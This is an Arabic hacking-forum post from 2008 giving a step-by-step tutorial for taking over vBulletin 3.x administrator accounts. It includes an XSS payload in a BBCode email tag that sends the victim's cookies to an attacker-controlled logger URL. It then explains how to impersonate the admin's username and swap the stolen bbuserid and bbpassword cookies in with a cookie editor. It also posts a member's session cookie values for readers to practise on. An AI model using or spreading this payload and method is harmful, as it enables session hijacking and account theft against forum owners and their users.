منتديات القرصان

**النمر اليافعي** · #1 08-26-2008, 06:32 AM

بسم الله الرحمن الرحيم

اليوم موضوعنا ياشباب عن تخطي الكوكيز في منتديات vb الجيل الثالث vb 3.0

والطريقة سهله جداً وماتحتاج برامج خاصه لها

وهي شغاله معي من أول ما ظهرت منتديات الجيل الثالث

لكن الطريقه حتى تظبط لازم يكون متوفر عندك البيانات التالية تبع العضو اللي تبي تدخل بحسابه

(1)

bblastvisit

(2)

bbpassword

(3)

bbuserid

(4)

bblastactivity

(5)

أي برنامج لتحرير الكوكيز

وراح أشرح لكم على البرنامج المشهور عندكم وهو ****** Editor

مع العلم يا شباب إنه أول حرفين من :

bblastactivity
bblastvisit
bbpassword
bbuserid

وهن bb ممكن يتغيروا من منتدى لأخر

لأنه على حسب ماوضع في ملف الــ config.php

المهم الأن البيانات هذي توفرها لك ثغرات الــ XSS

يعني اللي كان يقول إن ثغرات الـ XSS غير ضاره راح يتغيير رأيه بعد هذا الموضوع

وثغرات الـ XSS كثيره فيها اللذي تم الإعلان عنه وفيه اللذي لم يعلن عنه لحد الأن

وحتى الإصدار vb 3.0.7 فيه ثغرات XSS

وأعتقد إنكم أعلم لأني بالفتره الأخيره كنت غير موجود

المهم راح أطبق لكم الأن على منتداي بإحدى ثغرات الــ XSS قبل إغلاقها

واخترت أخوي سعودي للتطبيق عليه بعد الإستئذان منه طبعاً

الشرح :

( طريقة تخطي الكوكيز في منتديات VB الجيل الثالث )

1- اعرف اسم المشرف العام وسجل باسم قريب منه ثم نشط حسابك .

2- أرسل رساله للمشرف العام أو كيفما كانت طريقة ثغرة الــ XSS

بعد ربط اللوج تبعك بها أكيد .

وهذا مثال لإستخدام الثغره الي اكتشفها الفريق الروسي Securitylab

كود PHP:
[email=[URL=s as=`s@wew.ew]mailto:assss@wew.ew ]sssssss[/url][/email]` style=`background:url(javaSCrip t:document.images[1].src="htt"+"p"+":"+"/"+"/"+"AAA.com/xss/the-log.php?ksa="+document.******)`

مع استبدال

AAA.com/xss/the-log.php?ksa

برابط اللوج تبعك

وللمعلوميه يا شباب ماراح نتكلم في الموضوع هذا عن استخدام ثغرات الـ XSS

لأنه مو موضوعنا ولأنه سهل وشرح في أكثر من منتدى.

3- سوف تصلك بيانات الكوكيز بمثل هذا الشكل :

bblastactivity:1116521294
bblastvisit:1113986344
bbpassword:9c7ddb9e7f5e41f96896535509e8ca55
bbuserid:311

4- الأن أنت في الصفحه الرئيسيه للمنتدى قم بفتح برنامج تحرير الكوكيز ****** Editor

وابحث عن بيانات الكوكيز تبعك والخاصه بالمنتدى اللي سجلت فيه

يعني أنا راح أبحث باسم موقعي lezr

شوف الأن الصوره هذي هي بيانات الكوكيز تبعي

ومثل منتوا ملاحظين أنا سجلت باسم شبووح وهو اسم قريب من اسم سعودي ورقم عضويتي هو 4564

وأيضاً أكيد لاحظتوا إنه أول حرفين من :

bblastactivity
bblastvisit
bbpassword
bbuserid

هن ap لأنه مثل ماقلت لكم على حسب ماوضع في ملف الــ config.php

الأن قم باستبدال البيانات التي أمامك بالبيانات اللتي حصلت عليها باستخدام إحدى ثغرات الــ XSS وهي :

bblastactivity
bblastvisit
bbpassword
bbuserid

وأكيد كلكم يعرف الطريقه وللي مايعرف قم بالضغط بزر الفأره الأيمن واختر Edit ******

الأن أنا قمت باستبدال البيانات

ثم عملت تحديث لبرنامج الكوكيز ****** Editor .

5- قم بإغلاق صفحة المنتدى ثم قم بفتح صفحه جديده وادخل للمنتدى .

6- مبروك أنت الان المشرف العام .

وشوفوا تطبيقي أنا الان المراقب العام سعودي

ويا شباب مو معناها إذا ماقدرتوا تدخلون على لوحة التحكم ما تقدرون تعملون شيء !

لا غلط الأن إنفتح باب جديد أمامكم كل اللي عليكم إنكم تشغلون عقولكم شوي .

وفيه حاجه أساسيه ياشباب حتى تظبط الطريقه وهي السرعه

يعني أول ماتحصل المعلومات طبق على طول .

وبكذا إنتهى الموضوع ولأي سؤال فيه أنا جاهز

وللتطبيق ياشباب هذي بيانات عضو جديد قمت بتسجيله في المنتدى وتنشيطه

aplastvisit:1113744786
aplastactivity:1113761294
appassword:07e67efbb64e643bb7b48c6b1dd4a497
apuserid:4565

والعضو اسمه باللغه العربيه ومن 5 أحرف

الأن أبغى أشوف تطبيقكم أبغاكم تدخلون باسم العضو واللي يعرف اسم العضو

واسم بريده معناها إنه طبق الطريقة تمام

ومعناها إن شرحي صحيح والحمد لله وإن الأراء اللي سمعناها بإنه يستحيل التحايل

على الكوكيز في منتديات الجيل الثالث أو إنه لها برنامج خاص غير صحيحه .

ويالله ياشباب أبغاكم كلكم تطبقون وأضمن لكم بإذن الله إنكم راح تطبقون الطريقه تمام

وإن ماظبطت عشاكم الليله إن شاء الله عند ديزل

قول تم يا بنزين |2|

منقول

منتديات القرصان

الأن شرح تخطي الكوكيز في منتديات Vb الجيل الثالث

الأن شرح تخطي الكوكيز في منتديات Vb الجيل الثالث